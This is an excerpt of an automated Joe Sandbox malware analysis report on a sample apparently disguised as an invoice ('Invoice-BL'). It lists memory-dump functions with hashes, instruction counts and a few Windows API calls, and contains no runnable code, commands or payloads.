Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceb2a9f9b4afb21845d8c8bc66d4a15de6d48f38b326369e01e463b8d83ef5e4
Instruction ID: 8fe89d3ac4ff1d5961fda6c7404c29af03c83051b6d0d40e1fccde1fb119b14c
Opcode Fuzzy Hash: ceb2a9f9b4afb21845d8c8bc66d4a15de6d48f38b326369e01e463b8d83ef5e4
Instruction Fuzzy Hash: 66E08C32B004625BDB1A856CA945559B6CE878967DB3E8671FD28CB389FA22DC0643C0

Function 01317548 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0afd4eb6cf10ef1bfe6ae36ad1cc35479f6025f893097f99cb7f35174525583
Instruction ID: 7c9d373153d09c3462c43a6ecbc647a594553c64ea6591a2bf47702f1651fcc9
Opcode Fuzzy Hash: b0afd4eb6cf10ef1bfe6ae36ad1cc35479f6025f893097f99cb7f35174525583
Instruction Fuzzy Hash: C8D02B2630016617C95C316F201103F668F8FCA475354042AF409EB348CF64AC4343D1

Function 01311718 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83694a1cdc2c46789d23770c88dc997d6b08b2b14f83403cdae5fc95966c543f
Instruction ID: 9741e34b13bcfca2e27d44e4c4ef92ba1eece4862825a0faf6f33e796aef6af6
Opcode Fuzzy Hash: 83694a1cdc2c46789d23770c88dc997d6b08b2b14f83403cdae5fc95966c543f
Instruction Fuzzy Hash: 4AE0C2323001104F8748A77EF88885BB7DAEFC913135504BAF109C7325DD60CC0147D0

Function 01312EE0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97fa4a5a871ad1a36e417f2e0c6d33513e1153e8ff8e47dd265b48ac2b15c9fb
Instruction ID: 0aa063b7e34a3e563064d4682071d53b75b493425142f73040d098bba7b3e2fb
Opcode Fuzzy Hash: 97fa4a5a871ad1a36e417f2e0c6d33513e1153e8ff8e47dd265b48ac2b15c9fb
Instruction Fuzzy Hash: 4AE0DF3050A35DEFCB42DFA4E80449EBBF4FF4620070146EAD508CB642EA351E16CF92

Function 01312EF0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac182ce48df0c6c28d897fbf0cd41c161b5d0cf70c9ce080c1716ee18e10dc73
Instruction ID: fbec6d9655179936db85f3bc28f2d1e609de9262468dad553ffbe6d339dcd915
Opcode Fuzzy Hash: ac182ce48df0c6c28d897fbf0cd41c161b5d0cf70c9ce080c1716ee18e10dc73
Instruction Fuzzy Hash: 9AD05E74A0120DFFCB80EFA9E94059EB7F9EF48201B1086A9E50CD7304EA312F149B91

Function 013180E4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5adfbc39a1db7926538c9aaba9b19f3a87bc8dc11e1f5b09b1865e9fec19a9d4
Instruction ID: 0cb144f9ee5fedc12d1a459082a7c20e1b23030e747d228d5f1b5cde00eaa0d8
Opcode Fuzzy Hash: 5adfbc39a1db7926538c9aaba9b19f3a87bc8dc11e1f5b09b1865e9fec19a9d4
Instruction Fuzzy Hash: 2ED0C735F002199BCB04E768F8552AD7775E784355F104561E9159B38CDF749D1287C1

Function 01317BE7 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e83bb45e9c64de3900937e71a243546836cd3ffc6ecfb199d29fed9ecda7ad56
Instruction ID: 2d67d7fd787c2b709ea2b232c60e588d43ce271508158873afa1e0bae007fd1f
Opcode Fuzzy Hash: e83bb45e9c64de3900937e71a243546836cd3ffc6ecfb199d29fed9ecda7ad56
Instruction Fuzzy Hash: C4D012355180918FD7059B28D8ED2E57F61EF85304F1840E2C1D94B611DA205407CB85

Function 013175E6 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3250b26df448636e08fad089de4ea04a35344e638cb331a0a718addc9b5a82b
Instruction ID: 2cd98daa2970dd38c41d848d896e70e0a5ce29be67f4370277851ab1e7051d06
Opcode Fuzzy Hash: d3250b26df448636e08fad089de4ea04a35344e638cb331a0a718addc9b5a82b
Instruction Fuzzy Hash: 9FC01238A001268BCA1DFF5AF8484243765FB842013040658E90A87648FF259831CB21

Function 01318940 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b35ffb67440ea10d75685c04d397da9bf97a94e08581b7df3e8cf29e8435cd2f
Instruction ID: 3814c3d5877db381dd1fa0f264c2295b1835dab142756d82c8ae021ec770a741
Opcode Fuzzy Hash: b35ffb67440ea10d75685c04d397da9bf97a94e08581b7df3e8cf29e8435cd2f
Instruction Fuzzy Hash: 56C09B25C552404BC751A51549C61D43720B9514143C911C75944C4617DE18DC075605

Function 013109A2 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e474a2ceed410e783784fb7e43e7637d8075f65db194f64a0b08a0a0821cbe66
Instruction ID: 1db342865e6c09bb57f37631c83feac76b93b84b271f8f01734b6e539a12a621
Opcode Fuzzy Hash: e474a2ceed410e783784fb7e43e7637d8075f65db194f64a0b08a0a0821cbe66
Instruction Fuzzy Hash: 16C0127080428ACEE72D27A8A82C328BA16AB40709F001011BA831066D8E2506844713

Function 01310986 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c670acf2a6259dce46de0474b0ac6dff72c4bb924ff9169d00c883f2f53a7d39
Instruction ID: 5b0ca334429cb97ac9ce164d64039148ded08efd0d58aef2694ab9f17f801d8a
Opcode Fuzzy Hash: c670acf2a6259dce46de0474b0ac6dff72c4bb924ff9169d00c883f2f53a7d39
Instruction Fuzzy Hash: 0FC0127081428ECEEB2D2768A82C328BA17A78060AF001016B28310A6D8E2506848B13

Non-executed Functions

Function 0131FA82 Relevance: 6.5, Strings: 5, Instructions: 220COMMON

Download Yara Rule

Strings

LjTp, xrefs: 0131FB3D
PHqq, xrefs: 0131FD26
LjTp, xrefs: 0131FB49
DqTp, xrefs: 0131FAD4
0oTp, xrefs: 0131FAC8

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: 0oTp$DqTp$LjTp$LjTp$PHqq
API String ID: 0-2614287135
Opcode ID: 972e405a239c7f4285b51a750f2ea6cdcc3aaf57ffff79df0fe67d580041ec55
Instruction ID: 3c6d04c353b21bc1c57a45c457d70ec5e7393e948d0e41245276a71b7c033044
Opcode Fuzzy Hash: 972e405a239c7f4285b51a750f2ea6cdcc3aaf57ffff79df0fe67d580041ec55
Instruction Fuzzy Hash: 60818B757002058FDB48DF39D498A6D7BF6AF88714B2580A9E806DB3A9DB30DC46CB50

Analysis Process: SFHAWxtoIpgL.exePID: 7308, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	93
Total number of Limit Nodes:	5

Executed Functions

Function 02B9B218 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02B9B47E

Memory Dump Source

Source File: 00000007.00000002.1823309489.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b90000_SFHAWxtoIpgL.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b9238ed33e102aaef997bae83bdd5b1685ae049c59601c984c5097fd7bc3e805
Instruction ID: 524f849396132a49f15772a989b22fe41881fe9be286f104e0285aeee4af2a50
Opcode Fuzzy Hash: b9238ed33e102aaef997bae83bdd5b1685ae049c59601c984c5097fd7bc3e805
Instruction Fuzzy Hash: 7B813670A00B058FDB24DF2AE44575ABBF1FF88308F008A6ED48AD7A50DB75E945CB91

Function 02B9449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B959A9

Memory Dump Source

Source File: 00000007.00000002.1823309489.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b90000_SFHAWxtoIpgL.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 80c5b4b6649ad2059ad03f155e5fa0f2c7c46b3a4a7d087aec04b1652dd5af7f
Instruction ID: 9dbb3f4503f3cdbf8b96fe05f9fb04f87b9b9d51931a23f4c6974addc309ef19
Opcode Fuzzy Hash: 80c5b4b6649ad2059ad03f155e5fa0f2c7c46b3a4a7d087aec04b1652dd5af7f
Instruction Fuzzy Hash: 1441DFB0C0071DCBDB25DFA9C884B9EBBB5FF49304F6080AAD509AB251DB756949CF90

Function 02B958ED Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B959A9

Memory Dump Source

Source File: 00000007.00000002.1823309489.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b90000_SFHAWxtoIpgL.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a1db6735eb16f8295dd6ab0e6cd503682f929c7e290d00f70731d24b1a08a655
Instruction ID: 6c8455982e00a6a43bf90f0995c05d9b8ccc69b0908e19df9d0acff8c0a9a4c8
Opcode Fuzzy Hash: a1db6735eb16f8295dd6ab0e6cd503682f929c7e290d00f70731d24b1a08a655
Instruction Fuzzy Hash: C941EEB0C0071DCEDB24DFA9C88469EBBB2BF48304F6080AAD519AB251DB756949CF90

Function 02B9B208 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B9D3E6,?,?,?,?,?), ref: 02B9D8AF

Memory Dump Source

Source File: 00000007.00000002.1823309489.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b90000_SFHAWxtoIpgL.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f10748e2a4c3ae02a1d61d35f6104eb74c887c2072f48e0e5187b89275f42615
Instruction ID: 3a89a8fcc41285b3a74c9e3ab9851d9737b99b8d751aa981c5bc4e8f3fa509a2
Opcode Fuzzy Hash: f10748e2a4c3ae02a1d61d35f6104eb74c887c2072f48e0e5187b89275f42615
Instruction Fuzzy Hash: 032116B5900309DFDB10DFAAD984ADEBBF4FB48310F10806AE914A7351D378A954CFA1

Function 02B9D823 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B9D3E6,?,?,?,?,?), ref: 02B9D8AF

Memory Dump Source

Source File: 00000007.00000002.1823309489.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b90000_SFHAWxtoIpgL.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 87039c9a9c388412438a6fb5afe41e1d2ac3e850b0cdab0fa39cb7c69474250a
Instruction ID: 930631fa8708aa10a3605e456404fef075ca822f97e9df47353f3eaeec6619e4
Opcode Fuzzy Hash: 87039c9a9c388412438a6fb5afe41e1d2ac3e850b0cdab0fa39cb7c69474250a
Instruction Fuzzy Hash: 8921E6B59002099FDB10CFAAD984ADEBFF5FB48310F14805AE914A7351D374A944DF61

Function 075CB468 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 075CB4E3

Memory Dump Source

Source File: 00000007.00000002.1835402645.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75c0000_SFHAWxtoIpgL.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 689021b6bdcfc4000d8006a2a47d505ae0c642284f08386b61dbbed993ed93a7
Instruction ID: a7121e89bf3f86ca86b6ad6ef30a7158a43ba90001311c9976627c8ec9e52772
Opcode Fuzzy Hash: 689021b6bdcfc4000d8006a2a47d505ae0c642284f08386b61dbbed993ed93a7
Instruction Fuzzy Hash: 072136B68002499FCB10CF9AD885BDEFBF4FF48320F10842AE818A7641D774A584CFA1

Function 02B9B4B0 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02B9B47E

Memory Dump Source

Source File: 00000007.00000002.1823309489.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b90000_SFHAWxtoIpgL.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 05fcd5d930d0c481facd43162e975f4c3d10e47c9ce9f62effc90da078acabef
Instruction ID: d8d447c2f064229a270f86e1423050e55fcbd097235d22e1bdffc7bcec669a96
Opcode Fuzzy Hash: 05fcd5d930d0c481facd43162e975f4c3d10e47c9ce9f62effc90da078acabef
Instruction Fuzzy Hash: 7811C275A002049FDF10EB6AE8047ABB7F9EBC5318F1480BAD509D3251CB749801CBA0

Function 075CB470 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 075CB4E3

Memory Dump Source

Source File: 00000007.00000002.1835402645.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75c0000_SFHAWxtoIpgL.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 869fac71f3f82ea1079a3cde546507c61065210a821cbe89ba0005621f6dc3fe
Instruction ID: a5f2b29a5ca09eb223fb30602d8cf458ca825e2815fd743c203c702f62444acb
Opcode Fuzzy Hash: 869fac71f3f82ea1079a3cde546507c61065210a821cbe89ba0005621f6dc3fe
Instruction Fuzzy Hash: A721E7B5D002499FCB10DF9AC885BDEFBF5FB48320F10842AE958A7251D774A544DFA1

Function 02B9B418 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02B9B47E

Memory Dump Source

Source File: 00000007.00000002.1823309489.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b90000_SFHAWxtoIpgL.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e1d34dfe2cd243db52df09cbdbcb2ba5e19c7c19b0d23ea433fa8feb335d3284
Instruction ID: 8630898329c6fef515f05e895bde4079a7174ae047c8c1679ba2052c7ac6f53b
Opcode Fuzzy Hash: e1d34dfe2cd243db52df09cbdbcb2ba5e19c7c19b0d23ea433fa8feb335d3284
Instruction Fuzzy Hash: 00110FB6C003498FCB10CF9AD844A9EFBF4EB88728F14846AD419A7310C379A545CFA1

Function 010CD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1812649096.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10cd000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2bf4858b69d78527b55bc1997fed0801cc65031d6a942c9c8bd40d6cec1176b
Instruction ID: 72201caca64300fda88f13a52e6afff60e8b23d971f7035f52acc802fb4f0327
Opcode Fuzzy Hash: e2bf4858b69d78527b55bc1997fed0801cc65031d6a942c9c8bd40d6cec1176b
Instruction Fuzzy Hash: AD212471500200DFCB01DF58D8C0B2ABFA5FB94718F20C5BDE9490A246C336D416CBE1

Function 010DD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1814877111.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10dd000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b63ebd3e99787070f9fc442f593916949f44df5aa00101048de0df79c8f35ca
Instruction ID: c9859a6b7030f06d23f0b0f74e2fc845e042a7b8623c215577bcc9de5def84d6
Opcode Fuzzy Hash: 7b63ebd3e99787070f9fc442f593916949f44df5aa00101048de0df79c8f35ca
Instruction Fuzzy Hash: 7E21D375604300DFDB15DF58D984B16BFA5EB84354F24C9ADE98A4B286C336D407CB61

Function 010DD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1814877111.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10dd000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae1179543469e1d1126da07c46b614d5102ad086b9b8384d06dd99b5351de55b
Instruction ID: 5f96dff91db16a1d4e71e81c230d5a3d43e8ca92cf4ef2baabcb1fddb86b94a7
Opcode Fuzzy Hash: ae1179543469e1d1126da07c46b614d5102ad086b9b8384d06dd99b5351de55b
Instruction Fuzzy Hash: A421F575604300EFDB05DF98D9C4B25BBA5FB94324F24C6ADE98A4B292C336D406CB61

Function 010DD006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1814877111.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10dd000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ff9ef2cbaa725e811acbc49e1fd276a900ed6ce44ec49aec74232d9779e4ed9
Instruction ID: 4725c70acec95b794d1897e92f51667a9b24c694ae5725e802f2e086455a52dd
Opcode Fuzzy Hash: 3ff9ef2cbaa725e811acbc49e1fd276a900ed6ce44ec49aec74232d9779e4ed9
Instruction Fuzzy Hash: 8921C6755093808FDB13CF64D594715BFB1EB85314F28C5DAD8898B697C33AD40ACB62

Function 010CD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1812649096.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10cd000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: fda50d554018457cf2ae19f01d37f8a66389080fc98a4e23650e9324a9d7ac2d
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: 5F11DF76504280CFCB02CF54D9C4B1ABFB2FB94724F24C6ADD8490B256C336D45ACBA1

Function 010DD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1814877111.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10dd000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 40f6c3cb2d0001f3227a3d05ca50c684fb74d7fc6321861f93633f66448af5bd
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: BC11BB75904380DFDB02CF54C5C4B25BBB2FB84224F24C6ADD8894B696C33AD40ACB61

Analysis Process: SFHAWxtoIpgL.exePID: 7620, Parent PID: 7308COMMON

Execution Graph

Execution Coverage:	15.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	87
Total number of Limit Nodes:	0

Executed Functions

Function 01715AC0 Relevance: 1.5, Strings: 1, Instructions: 281
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vfm, xrefs: 01715D77

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: \Vfm
API String ID: 0-3356159168
Opcode ID: d53ae6d3ed0c16d131252392ad99e61e267fd7f25fcf28ec86a4b41b6e39b279
Instruction ID: 728ab910b4511f5e091713882d52ecacd90e3586b475a6cebac03cbfefd0182b
Opcode Fuzzy Hash: d53ae6d3ed0c16d131252392ad99e61e267fd7f25fcf28ec86a4b41b6e39b279
Instruction Fuzzy Hash: A2B13C70E002098FDB18CFADC98579EFBF2BF89714F148129D855AB298EB749845CF91

Function 01716390 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91a60730f7c99878f280f07fe4ee10aeb676e94ac85c0b7cef8242d7dd492c01
Instruction ID: d5e99cb8f9e4c007fc5ebe62d24436399a3e633143689a1a05b9d482d82365c4
Opcode Fuzzy Hash: 91a60730f7c99878f280f07fe4ee10aeb676e94ac85c0b7cef8242d7dd492c01
Instruction Fuzzy Hash: 9FB15D70E00209CFDB14CFADD98579DFBF2AF88714F248529E815E7298EBB49945CB81

Function 017115B8 Relevance: 6.7, Strings: 5, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(uq, xrefs: 01711A2A
Teqq, xrefs: 01711785
dLwq, xrefs: 017115F3
Huq, xrefs: 017116D8
LRqq, xrefs: 01711C23

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: (uq$Huq$LRqq$Teqq$dLwq
API String ID: 0-1868825565
Opcode ID: 2e6e6815b0e32e2df741baa44abc85ad2e38365e1293c74d3d367476021188e0
Instruction ID: 233237d9c1b089a5eb5a4d409d880eaca32a9026d81806fdddeebe9bbb38cfc8
Opcode Fuzzy Hash: 2e6e6815b0e32e2df741baa44abc85ad2e38365e1293c74d3d367476021188e0
Instruction Fuzzy Hash: 6602AC70B042158FCB45DB7DC454AAEBBF6BF89310F6484A9E506EF3A6DA34DC018B91

Function 060E5311 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 060E53A3

Strings

4'qq, xrefs: 060E535C

Memory Dump Source

Source File: 0000000B.00000002.4132706549.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_60e0000_SFHAWxtoIpgL.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: 4'qq
API String ID: 2492992576-1915349394
Opcode ID: 8e6747b0d4066ed3e594fb992bb721dc052a3e8bd10ab923f6f2792bb4240eed
Instruction ID: bbe1fed3872b90bc159c8d3c28ac24e036db2340b163eaa7f182ca81b0e14fb0
Opcode Fuzzy Hash: 8e6747b0d4066ed3e594fb992bb721dc052a3e8bd10ab923f6f2792bb4240eed
Instruction Fuzzy Hash: D92186B180031ADFCB48DFA9D844AAEFBF5FB48324F10851AD419B7290C7756944CFA4

Function 060E5320 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 060E53A3

Strings

4'qq, xrefs: 060E535C

Memory Dump Source

Source File: 0000000B.00000002.4132706549.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_60e0000_SFHAWxtoIpgL.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: 4'qq
API String ID: 2492992576-1915349394
Opcode ID: 4e2694cc27a8172d1b942402ec9d5cfb29745c05d66055ea1a4383a1af791693
Instruction ID: e64e14e3636db7dec5a1acae41f4db3c600f1cfe568e70048abee0d99a089fb0
Opcode Fuzzy Hash: 4e2694cc27a8172d1b942402ec9d5cfb29745c05d66055ea1a4383a1af791693
Instruction Fuzzy Hash: 2C2165B1D0435A8FCB40DFAAD8446EEBBF5FB48320F10851AD819B3280C7756944CFA5

Function 01716DA0 Relevance: 2.7, Strings: 2, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(uq, xrefs: 01716EF4
(uq, xrefs: 01716F20

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: (uq$(uq
API String ID: 0-921299607
Opcode ID: 131a04c5e2f4e40d1d75be126fc699a39542cc17c93105f89f13067e554a20f3
Instruction ID: 37660f92bac86ca5a896911181dba928c655a1dfa91473b58002bd403aa96fe7
Opcode Fuzzy Hash: 131a04c5e2f4e40d1d75be126fc699a39542cc17c93105f89f13067e554a20f3
Instruction Fuzzy Hash: B171B2713082514FCB19DF2DD89092EFBE6EFC521131485BAE909CF39ADA70EC4687A0

Function 017160FC Relevance: 2.7, Strings: 2, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vfm, xrefs: 017162CA
